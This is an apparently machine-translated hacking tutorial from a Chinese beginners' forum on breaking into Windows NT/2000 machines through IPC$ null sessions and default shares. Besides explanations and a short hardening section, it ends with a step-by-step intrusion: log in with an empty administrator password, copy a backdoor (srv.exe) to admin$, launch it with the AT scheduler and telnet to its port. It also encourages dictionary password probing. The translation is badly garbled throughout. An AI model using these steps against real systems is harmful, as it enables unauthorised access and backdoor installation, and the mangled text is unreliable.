Original: IQST (iqst) Source: Vegetable Bird Community http://ccbirds.yeah.net [ccbirds Getting Started Tutorial] - Everybreak 1 - IPC $ Intrusion: Online About IPC $ Intrusion Articles can be described as cow And there is no shortage, and the attack steps can even say that they have become classic models, so no one is willing to take this outdated thing. But though this, but I personally think that these articles explain. It is not detailed. For the first time to contact IPC $, the simple Rusp is not to answer their many confused (you just find a HACK forum to search for IPC, how much is there, so I wrote This is equivalent to the solution. I want to make some easier confusion, it is easy to confuse the question, let everyone don't always be in the same place! If you have finished reading this post, there is still questions, please reply immediately! III ipc $ IPC $ (Internet Process Connection) is a resource shared "named pipe" (everyone says this), it is to make the named pipe with inter-process communication, you can get the appropriate permissions by verifying the username and password, Use remotely manage your computer and view your computer's shared resource. With IPC $, the connectors can even create an empty connection with the target host without the username and password (of course, the other machine must open IPC $ sharing, otherwise you can't connect), and use this empty connection, The connector can also get a list of users on the target host (but the responsible administrator will prohibit the export user list). We are always talking about IPC $ vulnerability IPC $ vulnerability, in fact, IPC $ is not a true vulnerability, it is to facilitate administrator's remote management and open remote network login function, but also open the default sharing, ie all Logic disk (C $, D $, E $ ...) and system catalog Winnt or Windows (admin $). All of these, the original intention is to facilitate the management of the administrator, but the original intention does not necessarily have a good job, some don't have the heart (what is intention? I don't know, the pronoun is one) will take advantage of IPC $, access sharing Resources, export users list, and use some dictionary tools to perform password probing, hoping to achieve higher permissions, thus achieving non-maribei purposes. Squi: 1) IPC connection is a unique remote in Windows NT and above Network login feature, its functionality is equivalent to Telnet in UNIX, because IPC $ features need to use a lot of DLL functions in Windows NT, so you cannot run in Windows 9.x.
That is to say, only NT / 2000 / XP can be established IPC $ connection, 98 / ME can't create IPC $ Connection (but some friends said to build an empty connection in 98, I don't know if it is true, but now 2003 Year, I suggest that 98 comrades change the system, 98 is not cool) 2) Even if it is empty connection, it can be established. If the other party closes IPC $ sharing, you still have no connection 3) is not to establish The IPC $ Connection can view the other party's user list, as administrators can disable the export user list three to establish IPC $ Connection in the HACK attack, just as mentioned above, even if you have established an empty connection, you can also Get a lot of information (and this information is often an invaded), the access part is shared, if you can log in as a user with certain permissions, then you will get the appropriate permissions, obviously, if You log in as an administrator, 嘿嘿, don't have to say more, what u want, u can do !! (Basically, you can get the target information, manage the target process and service, upload the treasure horse and run, if 200RERVER, you can also consider opening the terminal service convenient control. How? It's enough!) But you don't want to be too early, because the administrator's password is not so good, although there will be some silly administrators Air password or mentally ministeptic password, but this is a few, and now it is not in the past, as people's safety awareness is improved, the administrators have become more careful, get the administrator's password will be more and more difficult: (So you have the biggest future The possibility is to connect with minimal permissions, and you will slowly discover IPC $ connection is not universal, even when the host does not turn on IPC $ sharing, you can't connect it. So I think, you Don't treat IPC $ invading as an ultimate weapon, don't think it's a battle, it is like a pass before the football field, rarely has a fatal effect, but it is indispensable, I think this It is the meaning of IPC $ connected to the Hack invasion. Four IPC $ with empty connection, 139, 445 port, the default shared relationship The above relationship The relationship between the above four may be a problem with the rookie very confused, but most of the articles are not special. Explain, in fact, I understand is not very thorough, all of which have been summed up in communication with everyone. (A BBS with a good discussion, can be said to be a rookie paradise) 1) IPC $ with empty connection: No need for username The password IPC $ connection is empty. Once you log in with a user or administrator (ie, IPC $ connected to a specific username and password), you can't be called empty connection. Many people may ask Since you can connect, then I will open it in the future. Why do you have to spend the power of Jiu Niu two tigers to scan the weak password, huh, hehe, when you mention it, when you log in with an empty connection You don't have any permissions (very depressed), and when you log in with the user or administrator, you will have the corresponding permissions (who is permission doesn't want, so still is old and real, don't be lazy). 2) IPC $ with 139,445 port: IPC $ connection can be remotely logged in and access to default sharing; and 139 ports are enabled by NetBIOS protocols, we can implement access to shared files / printers through 139,445 (Win2000) ports. Therefore, IPC $ is required to be supported by 139 or 445 ports. 3) IPC $ and the default sharing default share is to facilitate administrator remote management and the default open share (you can of course turn off it), that is, all Logic disk (C $, D $, E $ ...) and system directory WINNT or Windows (admin $), we can implement access to these default sharing through IPC $ (provided that the other party does not close these default sharing) 5 IPC The following five reasons for the connection failure is more common: 1) Your system is not NT or more operating system; 2) The other party does not open IPC $ default sharing 3) The other party does not open 139 or 445 port (Pictured firewall mask) 4) Your command input is incorrect (such as a space, etc.) 5) Username or password error (empty connection is of course, it doesn't matter), you can also analyze the reason according to the wrong number: Error number 5, refuse to access: Very The users you may use are not administrator privileges, first improve permissions; error number 51, Windows can't find network path: network has problems; error number 53, no network path: IP address error; target LanmanServer service Not started; the target has a firewall (port filtering);
Error number 67, find the network name: Your LanmanWorkStation service is not started; the target deletes IPC $; error number 1219, the information provided with the existing credentials: You have already established an IPC $ with the other party, please delete Reconnect. Error number 1326, unknown user name or error password: The reason is obvious; error number 1792, trying to log in, but network login service is not started: The target Netlogon service is not started. (This condition will appear in connection domain) Error number 2242, this user's password has expired: the target has an account policy, enforces the change in periodic requirements. Regarding IPC $, there is more complex problems. In addition to the above reasons, there will be some other uncertain factors, and this person cannot be detailed, it depends on everyone's own experience and trial. Six how to open the target IPC $ (This section is from related articles) First you need a shell that does not rely on IPC $, such as SQL's CMD extension, Telnet, Trojan, of course, this shell must be admin privileges, then you can use the shell to execute the command NET Share IPC $ is open to IPC $. From above, IPC $ can use there much of use. Please confirm that the relevant services have been running. If you don't start it (don't know how to do it, please see the usage of the NET command), or if you don't work (such as a firewall, killing) It is recommended to give up. Seven how to prevent IPC $ invading 1 Prohibition of empty connections (this operation does not block the establishment of empty connections, "Item from" Anatomy Win2000]) First run regedit, find the following set [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / CONTROL / LSA] Change the key value of Restrictanonymous = DWORD to: 00000001 (If set to 2, there are some problems that will happen, such as some WIN services, problems, etc.) 2 Prohibit Default Sharing 1) Take a local shared resource run -CMD - Enter net share 2) Delete Sharing (One Enter One) NET Share IPC $ / Delete Net Share Admin $ / Delete Net Share C $ / Delete Net Share D $ / Delete (if there is e, f, ... can continue to delete ) 3) Stop Server Service Net Stop Server / Y (Re-enable the Server service) 4) Modify the registry Run -Regedit Server version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] to put autoshareserver The key value of DWORD is changed to: 00000000. Pro version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] change the key value of AutoShaRewks (DWORD) to: 00000000. If the primary key mentioned above does not exist, you will be built (right-click-new-double-byte value) a primary and re-change key value.
3 Permanently shut down IPC $ and default sharing dependence: LanmanServer, Server Server Service Control Panel - Administrative Tools - Services - Find Server Services - Properties - Regular - Start Type - Disabled 4 Installed Firewall (Select Related Settings), Or port filtering (filtered out 139, 445, etc.), or use a new version of the optimization master 5 to set the complex password to prevent password passing through IPC $ (this tutorial is not updated regularly, please gain the latest version, please visit the official website: Vegetable Bird Community Original http://ccbirds.yeah.net) Eight Off Command 1) Create an empty connection: NET USE // IP / IPC $ "" / user: "(must pay attention to: This line of command contains 3 spaces) 2 ) Establish a non-empty connection: NET USE // IP / IPC $ "User Name" / User: "Password" (same with 3 spaces) 3) Mapping Default Sharing: NET USE Z: // IP / C $ "Password" / user: "User Name" (you can map the other party's C drive to your own Z disk, other disk classes) If IPC $ has been established with the target, you can use IP PV Nat $ Acquisition, Specific Command NET Use Z: // IP / C $ 4) Delete an IPC $ / DEL 5) Remove Sharing Map Net Use C: / DEL Delete the mapped C drive, other disk push NET USE * / DEL Delete all, there will be prompts to press Y to confirm that the invasion mode is too classic, most of the IPC tutorial has introduced, I will also take it, thank you for the original creator! (I don't know which senior is ) 1. C: /> NET USE //127.0.0.1/IPC $ "" / user: "admintitrators" This is an IP address that uses "stream" sweeping to the user name is Administrators, password is "empty" IP address (empty password) Wow, luck is good at home), if it is intended to attack, you can use such a command to establish a connection with 127.0.0.1, because the password is "empty", so the first quotation is not entered, and there is a double The quotation marks are the username, enter the administrators, and the command can be successfully completed. 2. C: /> Copy Srv.exe //127.0.0.1/admin $ Copy SRV.EXE first, there is in the direction of the Tools directory ($ refers to the admin user's C: / WinNT / System32 /, You can also use C $, D $, meaning the C disk and D disk, see where you want to copy it). 3. C: /> Net Time //127.0.0.1 Investigation Time, found 127.0.0.1 The current time of 127.0.0.1 is 2002/3/19 11:00 am, and the command successfully completed. 4. C: /> AT //127.0.0.1 11:05 srv.exe launches SRV.exe with the AT command (the time set here is faster than the host, or how you start, huh, huh!) 5. C: /> NET TIME / / 127.0.0.1 Check time no time? If the current time of 127.0.0.1 is 2002/3/19 11:05 am, then prepare to start the following command. 6. C: /> Telnet 127.0.0.1 99 This will use the telnet command, pay attention to the port is 99.
